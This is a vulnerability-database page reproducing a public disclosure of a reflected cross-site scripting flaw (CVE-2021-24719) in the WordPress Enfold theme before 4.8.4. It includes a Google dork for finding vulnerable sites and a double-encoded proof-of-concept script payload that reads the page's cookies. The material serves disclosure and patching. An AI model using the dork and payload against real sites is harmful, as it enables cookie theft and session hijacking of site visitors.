WordPress Enfold Theme 4.8.3 Cross Site Scripting
đïžÂ 19 Oct 2021 00:00:00Reported by Francisco Diaz-Pache AlonsoTypeÂ
 packetstormđ packetstormsecurity.comđ 416 Views
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| WordPress Theme Enfold 4.8.3 - Reflected Cross-Site Scripting Vulnerability | 19 Oct 202100:00 | â | zdt | |
| CVE-2021-24719 | 11 Oct 202111:15 | â | attackerkb | |
| CVE-2021-24719 | 11 Oct 202114:24 | â | circl | |
| WordPress æä»¶ è·šç«èæŹæŒæŽ | 11 Oct 202100:00 | â | cnnvd | |
| WordPress Enfold Enfold theme cross-site scripting vulnerability | 13 Oct 202100:00 | â | cnvd | |
| CVE-2021-24719 | 11 Oct 202110:45 | â | cve | |
| CVE-2021-24719 Enfold Theme < 4.8.4 - Reflected Cross-Site Scripting (XSS) | 11 Oct 202110:45 | â | cvelist | |
| WordPress Theme Enfold 4.8.3 - Reflected Cross-Site Scripting (XSS) | 19 Oct 202100:00 | â | exploitdb | |
| EUVD-2021-11631 | 7 Oct 202500:30 | â | euvd | |
| CVE-2021-24719 | 11 Oct 202111:15 | â | nvd |
10
`# Exploit Title: WordPress Theme Enfold 4.8.3 - Reflected Cross-Site Scripting (XSS)
# Google Dork: "inurl:avia-element-paging"
# Date: 18/10/2021
# Exploit Author: Francisco DĂaz-Pache Alonso, Sergio Corral Cristo and David Ălvarez Robles
# Vendor Homepage: https://kriesi.at/
# Version: Enfold < 4.8.4 (all versions)
# Tested on: Ubuntu
# CVE : CVE-2021-24719
# Full disclosure and PoC on: https://blog.asturhackers.es/cross-site-scripting-xss-reflejado-en-tema-enfold-4-8-4-para-wordpress
While navigating on WordPress sites with Enfold Theme previous than 4.8.4 version and Avia Page Builder, string âProofOfConceptâ can be reflected literally on pagination numbers. Moreover, the parameter âavia-element-pagingâ appears and can be used for crafting Google Dork based searches.
https://[hostname]/[path]?ProofOfConcept --> This URL must include pages shown by Enfold theme
Changing the âProofOfConceptâ text with a Cross-Site-Scripting (XSS) payload, the page processes and executes it. This is a reflected Cross-Site-Scripting (XSS) vulnerability. Find the following URL that includes the malicious payload.
https://[hostname]/[path]/?%2527%253E%253Cscript%253Eeval%2528atob%2528%2522Y29uc29sZS5sb2coZG9j --> This URL must include pages shown by Enfold theme
Payload (double encoded): this payload is double encoded in the URL from:
'><script>eval(atob("Y29uc29sZS5sb2coZG9jdW1lbnQuY29va2llKQ=="))</script>
Payload (base64): the âatobâ payload is Base64 encoded from:
console.log(document.cookie)
Navigating to the crafted URL, the console log displays some cookies that are used by the affected site (i.e. cookies with no âHttpOnlyâ flag set). However, the payload can be easily configurable.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Oct 2021 00:00Current
6.3Medium risk
Vulners AI Score6.3
EPSS0.02959